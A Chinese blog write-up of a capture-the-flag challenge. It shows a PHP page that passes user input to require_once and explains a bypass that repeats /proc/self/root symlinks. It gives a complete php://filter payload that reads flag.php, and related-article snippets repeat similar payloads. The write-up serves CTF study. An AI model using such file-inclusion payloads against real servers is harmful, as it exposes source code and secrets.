[WMCTF2020]Make PHP Great Again 2.0

最新推荐文章于 2023-12-08 10:03:14 发布
最新推荐文章于 2023-12-08 10:03:14 发布
阅读量585 收藏
点赞数
分类专栏: BUUCTF 漏洞整理 文章标签: php 开发语言
原文链接:https://blog.csdn.net/qq_46263951/article/details/119791348
版权

进入页面给出代码

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行

发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。

/proc/self指向当前进程的/proc/pid/
/proc/self/root/是指向/的符号链接

使用伪协议来读取flag,构造payload:
?file=php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu-[WMCTF2020]Make PHP Great Again
qaq517384的博客
10-26 254
考点: 绕过require_once() 打开环境就是源码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 第一反应是去百度绕过require_once(),毕竟见识小,小本本记一下 php源码分析 require_once 绕过不能重复包含文件的限制 /root/proc/self再多放几个也不是问题 payloa
RepVGG: Making VGG-style ConvNets Great Again
阿木寺的博客
01-12 3309
重振VGG雄风!主体仅使用3×3卷积和ReLU!据作者称,在ImageNet上,RepVGG的top-1准确性达到80%以上,这是基础模型的首次实现!综合性能超越ResNet、EfficientNet等,部分代码刚刚开源! 注1:文末附【计算机视觉细分垂直方向】交流群(含检测、分割、跟踪、医疗、GAN、Transformer等) 注2:欢迎点赞,支持分享! RepVGG RepVGG: Making VGG-style ConvNets Great Again 作者单位:清华大学(丁贵广团队), 旷视
[WMCTF2020]Make PHP Great Again非预期解原因
azraelxuemo的博客
12-01 420
当时这个题出现了一个这样的非预期解 ?file=php://filter/convert.base64-encode/resource=/nice/../../proc/self/cwd/flag.php 以及这样回失败 ?file=php://filter/convert.base64-encode/resource=/proc/self/cwd/flag.php 这里涉及php这样的一个trunk,我是调试源码发现的 环境配置 unsucess.php <?php include "flag.
[WMCTF2020]Make PHP Great Again
m0_62905261的博客
09-06 403
[WMCTF2020]Make PHP Great Again
BUUCTF--[WMCTF2020]Make PHP Great Again 2.0
qq_46263951的博客
08-18 639
进入页面给出代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行 发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。 /proc/sel..
wmctf2020 Make PHP Great Again
Firebasky的博客
08-15 4823
这个题目是之后赵师傅发了wp,自己进行复现的,因为自己比较菜,所以好多都是看师傅们的博客。 于是自己也来记录记录,下面还有一些问题,希望大佬们可以回答一下下。非常感谢!!! 题目代码: <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { $a=($_GET['file']); require_once($a); } 第一个是可以通过上传PHP_SESSION_UPLOAD_.
Make Python great again.zip
最新发布
07-09
Make Python great again
使UNMJobs再次伟大「Make UNMJobs Great Again」-crx插件
03-24
仅适用于UNMJobs 2.0用户。 此扩展旨在使UMMJobs 2.0 - Pilot中的某些任务更轻松。 目前的功能是:... 仅适用于UNMJobs 2.0用户。 此扩展旨在使UMMJobs 2.0 - Pilot中的某些任务更轻松。 目前的功能是: - 改善一些...
Apcahe2.0也能跑PHP3和PHP4.pdf
01-05
Apache2.0 配置指南 - 让 Apache2.0PHP3 和 PHP4 作为 Web 服务的核心组件,Apache 的升级速度非常快。然而,一些在 Apache 1.0 中可以正常运行的模块,在 Apache 2.0 中需要以不同的方式来运行,例如 PHP 3 和...
Final IK v2.0 IK骨骼动画插件2020年10月15日最新版
11-15
发布时间:2020年10月15日 2.0 For the full history of release notes, see FinalIK Change Log.pdf in the package. Upgrade Guide - MAKE A BACKUP! Open a new scene, delete “Plugins/RootMotion” and re...
[WMCTF2020]Make PHP Great Again 软连接绕过
qq_54929891的博客
05-23 903
<?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 打开题目一看,这么几行代码,就这? 话不多说直接伪协议读取flag.php php://filter/read=convert.base64-encode/resource=flag.php 欸嘿,啥都没出来,也没报错说什么有过滤??或许这个函数有可能不一样,去.
BUUCTF--[WMCTF2020]Make PHP Great Again
qq_46263951的博客
08-11 1115
进入页面后给出一段代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有一个require_once函数之前没有见过 require_once语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。 equire_once() 为了避免重复加载..
[WMCTF2021]Make PHP Great Again And Again
feng的博客
10-27 557
前言 也是很久之前WMCTF2021中Web的一道题目,当时一点头绪都没有,然后也没有复现,今天晚上跟着赵总的博客进行了学习,也是学习到了非常多的东西。本文只是跟着赵总的博客进行了一波复现,记录下来,仅此而已。 题目环境 题目本身给了shell,但是有着诸多的限制,包括disable_functions,open_basedir,flag文件是700等。 而且不出网,流量是nginx转发进内网。 考虑到是nginx+php-fpm,联想到之前蓝帽杯的那题,很正常会想到利用ftp的被动模式攻击fpm实现恶意加
[WMCTF2020]Make PHP Great Again require_once 特性
m0_64180167的博客
12-08 524
这里是特性我们首先来解释一下这个是我们的源代码。
-------已搬运--------BUUCTF:WMCTF2020]Make PHP Great Again --文件包含 --- require_once php7.4 的trick
Zero_Adam的博客
05-03 637
一、自己做: 代码简单, <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 用filter读取,能够读取到file=../../../../../etc/passwd。用上filter等等,就是读取不到flag.php。 然后我就想到了之前的 文件包含漏洞的。那个上传一个文件,然后包含自己,使得PHP程序运行不完,然后临
GNU make中文手册详解
GNU Make 手册 GNU Make 是一个自由软件,能够自动地构建、编译和安装软件。 GNU Make 手册是一个详细的指南,旨在帮助用户了解 GNU Make 的使用和配置。 **概述** GNU Make 是一个自由软件,旨在自动地构建、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值